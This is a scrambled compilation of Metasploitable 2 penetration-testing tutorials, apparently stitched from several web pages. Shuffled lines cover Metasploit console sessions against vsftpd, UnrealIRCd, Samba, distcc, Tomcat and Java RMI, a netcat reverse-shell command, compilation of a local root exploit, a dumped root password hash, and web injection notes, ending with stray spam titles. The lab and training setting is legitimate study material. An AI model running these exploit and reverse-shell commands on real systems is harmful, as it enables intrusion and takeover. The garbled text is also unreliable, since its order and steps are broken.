Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. RHOST 192.168.127.154 yes The target address
TIMEOUT 30 yes Timeout for the Telnet probe
[*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2021-02-06 23:51:01 +0300
For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. It aids the penetration testers in choosing and configuring of exploits. msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
However, we figured out that we could use Metasploit against one of them in order to get a shell, so were going to detail that here. Execute Metasploit framework by typing msfconsole on the Kali prompt: Search all . This is an issue many in infosec have to deal with all the time.
Starting Nmap 6.46 (, msf > search vsftpd
[*] Meterpreter session, using get_processes to find netlink pid
Heres a description and the CVE number: On Debian-based operating systems (OS), OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 uses the random number generator that produces predictable numbers, making it easier for remote attackers to perform brute force guessing attacks on cryptographic keys. ---- --------------- -------- -----------
Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator.
LHOST => 192.168.127.159
Exploiting Samba Vulnerability on Metasploit 2 The screenshot below shows the results of running an Nmap scan on Metasploitable 2. Module options (exploit/multi/http/tomcat_mgr_deploy):
Metasploitable 2 has deliberately vulnerable web applications pre-installed. RHOST yes The target address
Redirect the results of the uname -r command into file uname.txt. RETURN_ROWSET true no Set to true to see query result sets
[*] Automatically selected target "Linux x86"
Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, Downloading and Setting Up Metasploitable 2, Identifying Metasploitable 2's IP Address, https://information.rapid7.com/metasploitable-download.html, https://sourceforge.net/projects/metasploitable/. Setting the Security Level from 0 (completely insecure) through to 5 (secure). PASSWORD => tomcat
Metasploitable 2 is a deliberately vulnerable Linux installation. root 2768 0.0 0.1 2092 620 ? [*] Command: echo VhuwDGXAoBmUMNcg;
[*] Transmitting intermediate stager for over-sized stage(100 bytes)
This must be an address on the local machine or 0.0.0.0
More investigation would be needed to resolve it. Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1.
Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers.
Were not going to go into the web applications here because, in this article, were focused on host-based exploitation.
This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms. [*] Writing to socket A
[*] Matching
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
payload => linux/x86/meterpreter/reverse_tcp
VHOST no HTTP server virtual host
A vulnerability in the history component of TWiki is exploited by this module. RPORT 21 yes The target port
RHOSTS yes The target address range or CIDR identifier
Lets begin by pulling up the Mutillidae homepage: Notice that the Security Level is set to 0, Hints is also set to 0, and that the user is not Logged In. nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572
SESSION yes The session to run this module on.
[+] UID: uid=0(root) gid=0(root)
individual files in /usr/share/doc/*/copyright.
It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. : CVE-2009-1234 or 2010-1234 or 20101234) Be sure your Kali VM is in "Host-only Network" before starting the scan, so you can communicate with your target Metasploitable VM. Notice that it does not function against Java Management Extension (JMX) ports as they do not allow remote class loading unless some other RMI endpoint is active in the same Java process. This document outlines many of the security flaws in the Metasploitable 2 image. Step 4: ChooseUse anexisting virtual hard drive file, clickthe folder icon and select C:/users/UserName/VirtualBox VMs/Metasploitable2/Metasploitable.vmdk. PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
[*] Sending stage (1228800 bytes) to 192.168.127.154
[*] A is input
RHOST => 192.168.127.154
[*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb
XSS via logged in user name and signatureThe Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1, DOM injection on the add-key error message because the key entered is output into the error message without being encoded, You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value.You can SQL injection the UID cookie value because it is used to do a lookupYou can change your rank to admin by altering the UID valueHTTP Response Splitting via the logged in user name because it is used to create an HTTP HeaderThis page is responsible for cache-control but fails to do soThis page allows the X-Powered-By HTTP headerHTML commentsThere are secret pages that if browsed to will redirect user to the phpinfo.php page. We can read the passwords now and all the rest: root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.
[*] Matching
Cross site scripting on the host/ip fieldO/S Command injection on the host/ip fieldThis page writes to the log. USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line
msf exploit(unreal_ircd_3281_backdoor) > exploit
msf exploit(distcc_exec) > show options
SQLi and XSS on the log are possibleGET for POST is possible because only reading POSTed variables is not enforced. RPORT 3632 yes The target port
As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions. 0 Automatic Target
Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). ---- --------------- -------- -----------
The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. msf exploit(java_rmi_server) > show options
After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. -- ----
PASSWORD no A specific password to authenticate with
Then, hit the "Run Scan" button in the . . RHOST => 192.168.127.154
LHOST yes The listen address
In this example, Metasploitable 2 is running at IP 192.168.56.101.
msf auxiliary(telnet_version) > run
[*] B: "ZeiYbclsufvu4LGM\r\n"
[*] Matching
gcc root.c -o rootme (This will compile the C file to executable binary) Step 12: Copy the compiled binary to the msfadmin directory in NFS share. Just enter ifconfig at the prompt to see the details for the virtual machine.
[*] Accepted the second client connection
Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.". Metasploitable 3 is the updated version based on Windows Server 2008. [*] Command: echo qcHh6jsH8rZghWdi;
echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run, nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539]
df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev
TOMCAT_PASS no The Password for the specified username
[*] Reading from sockets
Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres. The default login and password is msfadmin:msfadmin.
LHOST => 192.168.127.159
USERNAME no The username to authenticate as
[*] udev pid: 2770
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2021-02-06 23:03:13 +0300
If so please share your comments below.
SRVPORT 8080 yes The local port to listen on. RHOSTS yes The target address range or CIDR identifier
The following command line will scan all TCP ports on the Metasploitable 2 instance: Nearly every one of these listening services provides a remote entry point into the system.
Browsing to http://192.168.56.101/ shows the web application home page.
[+] Backdoor service has been spawned, handling
The primary administrative user msfadmin has a password matching the username. rapid7/metasploitable3 Wiki.
5.port 1524 (Ingres database backdoor ) This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). Module options (auxiliary/scanner/smb/smb_version):
Below is a list of the tools and services that this course will teach you how to use.
[*] A is input
nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks
METASPLOIT On-Prem Vulnerability Management NEXPOSE Digital Forensics and Incident Response (DFIR) Velociraptor Cloud Risk Complete Cloud Security with Unlimited Vulnerability Management Explore Offer Managed Threat Complete MDR with Unlimited Risk Coverage Explore offer Services MANAGED SERVICES Detection and Response
Name Current Setting Required Description
You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g.
Exploit target:
[*] Reading from sockets
root, http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar, Kali Linux VPN Options and Installation Walkthrough, Feroxbuster And Why It Is The Best Forced Browsing Attack Tool, How to Bypass Software Security Checks Through Reverse Engineering, Ethical Hacking Practice Test 6 Footprinting Fundamentals Level1, CEH Practice Test 5 Footprinting Fundamentals Level 0.
whoami
Step 5: Select your Virtual Machine and click the Setting button. When hacking computer systems, it is essential to know which systems are on your network, but also know which IP or IPs you are attempting to penetrate.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. Have you used Metasploitable to practice Penetration Testing?
Select Metasploitable VM as a target victim from this list. Metasploitable 2 is available at: CVE is a list of publicly disclosed cybersecurity vulnerabilities that is free to search, use, and incorporate into products and services, per the terms of use. Learn Ethical Hacking and Penetration Testing Online. Within Metasploitable edit the following file via command: Next change the following line then save the file: In Kali Linux bring up the Mutillidae web application in the browser as before and click the Reset DB button to re-initialize the database. msf exploit(usermap_script) > set RHOST 192.168.127.154
[*] Reading from socket B
The advantage is that these commands are executed with the same privileges as the application. Combining Nmap with Metasploit for a more detailed and in-depth scan on the client machine.
LHOST => 192.168.127.159
The easiest way to get a target machine is to use Metasploitable 2, which is an intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities.
[*] Writing exploit executable (1879 bytes) to /tmp/DQDnKUFLzR
If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH. You can edit any TWiki page.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Our first attempt failed to create a session: The following commands to update Metasploit to v6.0.22-dev were tried to see if they would resolve the issue: Unfortunately the same problem occurred after the version upgrade which may have been down to the database needing to be re-initialized. In Metasploit, an exploit is available for the vsftpd version. It contains well written, well thought and well explained computer science and programming articles, quizzes and practice/competitive programming/company interview Questions. Name Current Setting Required Description
[*] 192.168.127.154:5432 Postgres - Disconnected
THREADS 1 yes The number of concurrent threads
For your test environment, you need a Metasploit instance that can access a vulnerable target.
Both operating systems will be running as VM's within VirtualBox.
You could log on without a password on this machine. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image.
0 Generic (Java Payload)
This document outlines many of the security flaws in the Metasploitable 2 image.
Name Current Setting Required Description
Name Current Setting Required Description
[*] A is input
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname
Same as login.php.
RPORT 1099 yes The target port
By default, msfconsole opens up with a banner; to remove that and start the interface in quiet mode, use the msfconsole command with the -q flag. Step 3: Set the memory size to 512 MB, which is adequate for Metasploitable2. -- ----
Initially, to get the server version we will use an auxiliary module: Now we can use an appropriate exploit against the target with the information in hand: Samba username map script Command Execution. We will do this by hacking FTP, telnet and SSH services. Weve used an Auxiliary Module for this one: So you know the msfadmin account credentials now, and if you log in and play around, youll figure out that this account has the sudo rights, so you can executecommands as root. [*] Writing to socket B
And this is what we get: Id Name
RPORT => 8180
msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787
Previous versions of Metasploitable were distributed as a VM snapshot where everything was set up and saved in that state . Copyright 2023 HackingLoops All Rights Reserved, nmap -p1-65535 -A 192.168.127.154
Name Current Setting Required Description
whoami
Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. This program makes it easy to scale large compiler jobs across a farm of like-configured systems. Exploit target:
The exploit executes /tmp/run, so throw in any payload that you want. 22. Exploit target:
[*] Started reverse handler on 192.168.127.159:4444
So, as before with MySQL, it is possible to log into this database, but we have checked for the available exploits of Metasploit and discovered one which can further the exploitation: The Postgresaccount may write to the /tmp directory onsome standard Linux installations of PostgreSQL and source the UDF Shared Libraries om there, enabling arbitrary code execution. Enter the required details on the next screen and click Connect. USERNAME postgres no A specific username to authenticate as
Step 1:Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. The major purpose why use of such virtual machines is done could be for conducting security trainings, testing of security tools, or simply for practicing the commonly known techniques of penetration testing.
[*] Attempting to automatically select a target
0 Automatic
Do you have any feedback on the above examples?
NetlinkPID no Usually udevd pid-1.
By default, Metasploitable's network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Individual web applications may additionally be accessed by appending the application directory name onto http://
Punny Wedding Hashtag Generator,
Captain, Byron Voutsinas,
Articles M